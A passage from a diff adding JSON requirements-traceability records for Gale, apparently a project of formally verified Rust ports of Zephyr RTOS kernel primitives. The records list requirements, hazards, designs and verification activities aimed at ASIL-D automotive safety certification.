+      "description": "The write index is always strictly less than max_msgs, ensuring valid ring buffer access. Maps to msg_q.c:43-470.\n",
+      "id": "SWREQ-MQ-MQ03",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MQ-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MQ3: write_idx < max_msgs (index bounds)",
+      "type": "sw-req"
+    },
+    {
+      "description": "After grant_access(tid), the permission bit for thread tid is set. Grant is idempotent.\n",
+      "id": "SWREQ-US-US02",
+      "links": [
+        {
+          "target": "SYSREQ-US-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "grant",
+        "asil-d"
+      ],
+      "title": "US2: grant_access sets the permission bit",
+      "type": "sw-req"
+    },
+    {
+      "description": "When unlock is called by the owner and lock_count == 1 with no waiters, the mutex is fully unlocked: owner cleared to None and lock_count set to 0. Maps to z_impl_k_mutex_unlock lines 297-299 in kernel/mutex.c.\n",
+      "id": "SWREQ-MUT-M09",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "unlock",
+        "full-release",
+        "asil-d"
+      ],
+      "title": "M9: unlock with no waiters fully unlocks (count=0, owner=None)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The semaphore count wraps past its defined [0, limit] range, corrupting the signalling contract between producers and consumers and leading to incorrect resource accounting.\n",
+      "id": "H-3",
+      "links": [
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "semaphore",
+        "overflow"
+      ],
+      "title": "Semaphore count overflow or underflow",
+      "type": "hazard"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mechanism allowing threads to acquire a semaphore.\n",
+      "id": "ZEP-SRS-5-6",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore acquisition mechanism",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The system shall implement a fixed-size block memory allocator for deterministic memory allocation.\n",
+      "id": "ZEP-SYRS-MS",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mem-slab"
+      ],
+      "title": "Zephyr: Memory Slab Allocator",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "If resetting (FLAG_RESET set): ECANCELED. If closed and empty: EPIPE. If request_len == 0: ENOMSG. Otherwise clamp actual_len to min(request_len, available data) and decrement used.\n",
+      "id": "SWDD-PP-READ",
+      "links": [
+        {
+          "target": "SWARCH-PP-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-PP-PP03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PP-PP05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PP-PP07",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PP-PP10",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-PP-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "read"
+      ],
+      "title": "Pipe::read_check — z_impl_k_pipe_read validation",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "If closed (flags == 0): EPIPE. If resetting (FLAG_RESET set): ECANCELED. If request_len == 0: ENOMSG. Otherwise clamp actual_len to min(request_len, free space) and increment used.\n",
+      "id": "SWDD-PP-WRITE",
+      "links": [
+        {
+          "target": "SWARCH-PP-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-PP-PP02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PP-PP04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PP-PP06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PP-PP09",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-PP-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "write"
+      ],
+      "title": "Pipe::write_check — z_impl_k_pipe_write validation",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "When wait is called and the atomic value does not equal expected, the call returns -EAGAIN immediately without blocking. Maps to futex.c:81-83.\n",
+      "id": "SWREQ-FX-FX02",
+      "links": [
+        {
+          "target": "SYSREQ-FX-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "wait",
+        "error",
+        "asil-d"
+      ],
+      "title": "FX2: wait with val != expected returns EAGAIN",
+      "type": "sw-req"
+    },
+    {
+      "description": "No Gale-verified kernel primitive shall depend on monitoring subsystem code for correct operation.  Monitoring hooks are purely observational and may be removed without affecting functional behavior.\n",
+      "id": "SWREQ-MON-M02",
+      "links": [
+        {
+          "target": "SYSREQ-MON-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "monitoring",
+        "independence",
+        "safety"
+      ],
+      "title": "MON2: No monitoring dependency in safety path",
+      "type": "sw-req"
+    },
+    {
+      "description": "The top-level safety claim.  Gale's formally verified Rust kernel primitives provide a safety argument sufficient for automotive ASIL-D classification per ISO 26262 when deployed on ARM Cortex-M targets running Zephyr v3.x.\n",
+      "id": "G-1",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "goal-addresses-hazard"
+        },
+        {
+          "target": "H-2",
+          "type": "goal-addresses-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "goal-addresses-hazard"
+        },
+        {
+          "target": "H-4",
+          "type": "goal-addresses-hazard"
+        },
+        {
+          "target": "H-5",
+          "type": "goal-addresses-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "goal-addresses-hazard"
+        },
+        {
+          "target": "L-1",
+          "type": "goal-addresses-hazard"
+        },
+        {
+          "target": "L-2",
+          "type": "goal-addresses-hazard"
+        },
+        {
+          "target": "L-3",
+          "type": "goal-addresses-hazard"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "safety",
+        "asil-d",
+        "top-goal"
+      ],
+      "title": "Gale kernel primitives are safe for ASIL-D deployment",
+      "type": "safety-goal"
+    },
+    {
+      "description": "Kernel object permission model with grant_access/revoke_access/ check_access/validate/init_object/uninit_object/recycle/make_public. Tracks per-thread permission bitmask and object flags. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-US-001",
+      "links": [
+        {
+          "target": "SWREQ-US-US01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-US-US04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-US-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "architecture"
+      ],
+      "title": "Userspace module (gale::userspace)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Integration tests exercising alloc-free roundtrips, fill-drain cycles, and multi-block operations.\n",
+      "id": "IV-MP-001",
+      "links": [
+        {
+          "target": "SWARCH-MP-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "MemPool integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all smp_state code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-SM-003",
+      "links": [
+        {
+          "target": "SWREQ-SM-SM01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "SmpState Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When a semaphore is reset, the Zephyr RTOS shall abort all existing acquisitions of the semaphore returning a resource contention error code.\n",
+      "id": "ZEP-SRS-5-17",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore acquisitions abort after reset",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Lock-free ring buffer index model with init/put/get/put_n/get_n/ peek_at/reset. Tracks head, tail, size with modular arithmetic. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-RB-001",
+      "links": [
+        {
+          "target": "SWREQ-RB-RB01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-RB-RB03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-RB-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "architecture"
+      ],
+      "title": "Ring buffer module (gale::ring_buf)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Verus specifications in src/priority.rs with requires/ensures clauses that formally verify bounded priority type correctness via SMT solving. Proves new() range validation, get() bounds, comparison total order, and transitivity of priority ordering. Executed via: bazel test //:verus_test\n",
+      "id": "FV-PRI-001",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P10",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Priority Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "wait_all is satisfied when the bitwise AND of the event value and the requested mask equals the requested mask (all requested bits are set).\n",
+      "id": "SWREQ-EV-EV06",
+      "links": [
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-EV-2",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-EV-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "wait-all",
+        "asil-d"
+      ],
+      "title": "EV6: wait_all condition",
+      "type": "sw-req"
+    },
+    {
+      "description": "Fuzz targets in fuzz/fuzz_targets/ exercising random operation sequences on semaphore and init boundary conditions with random count/limit values. Coverage-guided mutation testing.\n",
+      "id": "UV-SEM-005",
+      "links": [
+        {
+          "target": "SWDD-SEM-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-GIVE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-TRY-TAKE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "fuzz",
+        "swe-4"
+      ],
+      "title": "Fuzz testing (cargo-fuzz)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "If empty: return EAGAIN. Else: record head slot, advance head with wrap, decrement size. C source: lib/utils/ring_buffer.c lines 78-103.\n",
+      "id": "SWDD-RB-GET",
+      "links": [
+        {
+          "target": "SWARCH-RB-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-RB-RB04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-RB-RB06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-RB-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "get"
+      ],
+      "title": "RingBuf::get — ring_buf_get port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Coverage matrix in artifacts/design.yaml (SWARCH entries) accounts for every Zephyr kernel C module — either replaced by a Gale implementation or explicitly excluded with rationale. All safety-critical modules (sem, mutex, condvar, msgq, stack, pipe, timer, event, mem_slab, fifo, lifo, queue, mbox, futex, poll, timeout, timeslice, work, kheap, mempool, fatal, dynamic, smp, thread, sched) have corresponding Verus-verified Rust implementations.\n",
+      "id": "SV-COV-001",
+      "links": [
+        {
+          "target": "SYSREQ-COV-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "coverage",
+        "sys-5"
+      ],
+      "title": "Module coverage matrix system verification",
+      "type": "sys-verification"
+    },
+    {
+      "description": "When wait_blocking is called, the thread is blocked and inserted into the wait queue in priority order.  Queue length increases by 1. Maps to condvar.c:99-121.\n",
+      "id": "SWREQ-CV-C06",
+      "links": [
+        {
+          "target": "SYSREQ-CV-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-CV-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "wait",
+        "blocking",
+        "asil-d"
+      ],
+      "title": "C6: wait adds thread to wait queue (blocking path)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The run queue maintains priority ordering after any add, remove, or yield operation.\n",
+      "id": "SWREQ-SC-SC12",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "priority",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "SC12: priority ordering preserved across operations",
+      "type": "sw-req"
+    },
+    {
+      "description": "All active partition slots have strictly positive size. Enforced by check_add_partition and is_valid().\n",
+      "id": "SWREQ-MD-MD03",
+      "links": [
+        {
+          "target": "SYSREQ-MD-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-domain",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MD3: partition size > 0 for all active partitions",
+      "type": "sw-req"
+    },
+    {
+      "description": "When status_get is called, the current status value is returned and the status counter is reset to zero in a single logical step.\n",
+      "id": "SWREQ-TM-TM02",
+      "links": [
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TM-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "status-get",
+        "asil-d"
+      ],
+      "title": "TM2: status_get atomically reads and resets",
+      "type": "sw-req"
+    },
+    {
+      "description": "The buffer occupancy is always bounded by capacity.\n",
+      "id": "SWREQ-RB-RB01",
+      "links": [
+        {
+          "target": "SYSREQ-RB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "RB1: 0 <= size <= capacity (bounds invariant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unit tests in plain/src/mutex.rs covering init, try_lock (unlocked/reentrant/contended), lock_blocking, unlock (not-locked/not-owner/reentrant/transfer/full), lock-unlock roundtrip, and invariant preservation.\n",
+      "id": "UV-MUT-001",
+      "links": [
+        {
+          "target": "SWDD-MUT-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-LOCK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-LOCK-BLOCKING",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-UNLOCK",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Mutex unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The best thread from the run queue is the one with the numerically lowest priority value (highest scheduling priority). Maps to sched.c:101-108.\n",
+      "id": "SWREQ-SC-SC03",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SC-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "runq",
+        "priority",
+        "asil-d"
+      ],
+      "title": "SC3: runq_best returns highest-priority thread",
+      "type": "sw-req"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's work queue subsystem. Contains k_work_init, k_work_busy_get, k_work_submit_to_queue, k_work_cancel, finalize_cancel_locked. The Gale port models the work item state machine only — queue management and handler dispatch stay in C.\n",
+      "id": "PROV-WK-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "work",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/work.c — work queue state machine",
+      "type": "source-provenance"
+    },
+    {
+      "description": "The timeout list is always sorted in ascending order of expiry ticks. Insertion maintains this invariant.\n",
+      "id": "SWREQ-TO-TO07",
+      "links": [
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TO-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "TO7: timeout list remains sorted by expiry",
+      "type": "sw-req"
+    },
+    {
+      "description": "Poll event state transitions follow a valid state machine. Events can only transition from NOT_READY to a ready state, and must be re-initialized to return to NOT_READY.\n",
+      "id": "SWREQ-PL-PL07",
+      "links": [
+        {
+          "target": "SYSREQ-PL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "fsm",
+        "asil-d"
+      ],
+      "title": "PL7: event state transitions are valid (NOT_READY -> READY only)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Corrupted kernel state (thread control blocks, synchronization primitive state, memory ownership records) produces incorrect outputs or silent data errors that propagate to higher-level safety functions.\n",
+      "id": "L-2",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "loss"
+      ],
+      "title": "Loss of data integrity",
+      "type": "loss"
+    },
+    {
+      "description": "Add and sub use wrapping arithmetic: result = (a op b) mod 2^32. This matches hardware u32 behavior on Cortex-M.\n",
+      "id": "SWREQ-AT-AT06",
+      "links": [
+        {
+          "target": "SYSREQ-AT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "atomic",
+        "wrapping",
+        "asil-d"
+      ],
+      "title": "AT6: wrapping semantics for add/sub (matching hardware u32 behavior)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The system shall implement a FIFO synchronization primitive for first-in first-out data exchange between threads.\n",
+      "id": "ZEP-SYRS-FI",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "fifo"
+      ],
+      "title": "Zephyr: FIFO",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide k_thread_abort to terminate a thread with cleanup and k_thread_join to block the calling thread until the target thread terminates.\n",
+      "id": "ZEP-SRS-TL-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-TL",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-TL-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "thread"
+      ],
+      "title": "Zephyr: Thread Abort and Join",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Cancel always clears the QUEUED flag. If still busy (RUNNING), the CANCELING flag is set.\n",
+      "id": "SWREQ-WK-WK05",
+      "links": [
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-WK-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "work",
+        "cancel",
+        "asil-d"
+      ],
+      "title": "WK5: cancel clears QUEUED and sets CANCELING if RUNNING",
+      "type": "sw-req"
+    },
+    {
+      "description": "LIFO stack bounded counter model. Tracks count and capacity for push/pop validation. Actual data storage stays in C — Gale verifies bounds safety only. No unsafe code.\n",
+      "id": "SWARCH-SK-001",
+      "links": [
+        {
+          "target": "SWREQ-SK-SK01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SK-SK02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-SK-SK03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-SK-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "architecture"
+      ],
+      "title": "Stack module (gale::stack)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "When no match is found, both sender and receiver state remain unchanged. No partial state modifications occur.\n",
+      "id": "SWREQ-MB-MB05",
+      "links": [
+        {
+          "target": "SYSREQ-MB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "safety",
+        "asil-d"
+      ],
+      "title": "MB5: no unmatched message leaves stale state",
+      "type": "sw-req"
+    },
+    {
+      "description": "A memory slab allocator that matches the Zephyr k_mem_slab API semantics: initialization with num_blocks and block_size, alloc (increment used), and free (decrement used).  Must maintain block count bounds and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-MS-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-MS",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "kernel"
+      ],
+      "title": "Memory slab block counter with alloc/free",
+      "type": "system-req"
+    },
+    {
+      "description": "A cycle of blocked threads (e.g. two threads each holding one mutex and waiting for the other) causes the kernel to make no forward progress, permanently preventing safety functions from executing.\n",
+      "id": "H-4",
+      "links": [
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "deadlock",
+        "mutex",
+        "condvar"
+      ],
+      "title": "Deadlock in kernel synchronization primitives",
+      "type": "hazard"
+    },
+    {
+      "description": "MMFAR and BFAR values are only reported when their respective validity bits (MMARVALID, BFARVALID) are set in CFSR.\n",
+      "id": "SWREQ-FD-FH02",
+      "links": [
+        {
+          "target": "SYSREQ-FD-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fault-decode",
+        "validity",
+        "asil-d"
+      ],
+      "title": "FH2: fault address valid only when MMARVALID/BFARVALID set",
+      "type": "sw-req"
+    },
+    {
+      "description": "When wake is called with wake_all=true, all threads are removed from the wait queue. Maps to futex.c:41-48.\n",
+      "id": "SWREQ-FX-FX05",
+      "links": [
+        {
+          "target": "SYSREQ-FX-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FX-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "wake",
+        "asil-d"
+      ],
+      "title": "FX5: wake_all=true wakes all waiters",
+      "type": "sw-req"
+    },
+    {
+      "description": "Memory slab block counter model with init/alloc/free. Tracks num_used, num_blocks, and block_size for allocation validation. Actual memory management stays in C — Gale verifies counter bounds safety only. No unsafe code.\n",
+      "id": "SWARCH-MS-001",
+      "links": [
+        {
+          "target": "SWREQ-MS-MS01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MS-MS02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MS-MS04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-MS-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "architecture"
+      ],
+      "title": "MemSlab module (gale::mem_slab)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Acquire if free (owner=None). Set owner, nest_count=1, irq_saved=true. C source: kernel/spinlock_validate.c lines 10-42.\n",
+      "id": "SWDD-SL-ACQUIRE",
+      "links": [
+        {
+          "target": "SWARCH-SL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SL-SL01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SL-SL05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "spinlock",
+        "acquire"
+      ],
+      "title": "SpinlockState::acquire — z_spin_lock_valid/set_owner port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Integration tests in tests/mutex_integration.rs exercising the full mutex API surface across module boundaries. Tests invariant preservation, lock/unlock semantics, reentrant locking, contention, ownership transfer, error paths, and priority ordering.\n",
+      "id": "IV-MUT-001",
+      "links": [
+        {
+          "target": "SWARCH-MUT-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Mutex integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Unit tests in src/fault_decode.rs covering classify (all fault categories), mmfar_checked/bfar_checked (valid/invalid), is_escalated, is_vecttbl_fault, individual bit checks, and clean-register no-fault.\n",
+      "id": "UV-FD-001",
+      "links": [
+        {
+          "target": "SWDD-FD-CLASSIFY",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "FaultDecode unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all stack_config code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-SKS-003",
+      "links": [
+        {
+          "target": "SWREQ-SKS-SK01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "StackConfig Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Integration tests in tests/msgq_integration.rs exercising the full message queue API surface across module boundaries. Tests init validation, put/get FIFO ordering, put_front, peek_at, purge, ring buffer wrap-around, full/empty boundaries, ring consistency, conservation invariant, and stress fill-drain cycles.\n",
+      "id": "IV-MQ-001",
+      "links": [
+        {
+          "target": "SWARCH-MQ-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "MsgQ integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "When prepend is called, the item count increments by 1. Maps to queue.c:206-213.\n",
+      "id": "SWREQ-QU-QU03",
+      "links": [
+        {
+          "target": "SYSREQ-QU-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-QU-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "prepend",
+        "asil-d"
+      ],
+      "title": "QU3: prepend increments count by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "Bitwise OR the posted bits into the current event value.\n",
+      "id": "SWDD-EV-POST",
+      "links": [
+        {
+          "target": "SWARCH-EV-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-EV-EV01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-EV-EV08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-EV-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "post"
+      ],
+      "title": "Event::post — z_impl_k_event_post port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The timer status counter is always non-negative. This is the fundamental invariant maintained across all operations.\n",
+      "id": "SWREQ-TM-TM01",
+      "links": [
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TM-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "TM1: status >= 0 (non-negative)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Reject double-init (EBUSY). Check level ordering. Call init function and record result. Increment initialized count. C source: kernel/device.c lines 18-61.\n",
+      "id": "SWDD-DI-INIT-DEVICE",
+      "links": [
+        {
+          "target": "SWARCH-DI-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-DI-DI01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-DI-DI02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-DI-DI05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-DI-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "device-init",
+        "init"
+      ],
+      "title": "DeviceInitState::init_device — do_device_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Full stack test suite run under Miri to detect undefined behavior, use-after-free, out-of-bounds access, and uninitialized memory reads.\n",
+      "id": "UV-SK-004",
+      "links": [
+        {
+          "target": "SWDD-SK-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SK-PUSH",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SK-POP",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "miri",
+        "safety",
+        "swe-4"
+      ],
+      "title": "Stack Miri undefined behavior detection",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The system shall implement a kernel heap allocator supporting dynamic memory allocation with blocking wait and alignment control.\n",
+      "id": "ZEP-SYRS-KH",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "kheap"
+      ],
+      "title": "Zephyr: Kernel Heap",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "FV-TRACTOR-DIFF: differential tests exercise the Gale implementations against POSIX semaphore/mutex and FreeRTOS queue reference models, verifying that every observable state transition matches specification. Complements formal proofs with concrete execution traces.\n",
+      "id": "Sn-2",
+      "links": [
+        {
+          "target": "G-3",
+          "type": "supports"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "testing",
+        "differential"
+      ],
+      "title": "Differential specification testing (POSIX/FreeRTOS reference models)",
+      "type": "safety-solution"
+    },
+    {
+      "description": "The message count is always between 0 and max_msgs inclusive. This is the fundamental invariant maintained across all operations. Maps to msg_q.c:43-470.\n",
+      "id": "SWREQ-MQ-MQ01",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        },
+        {
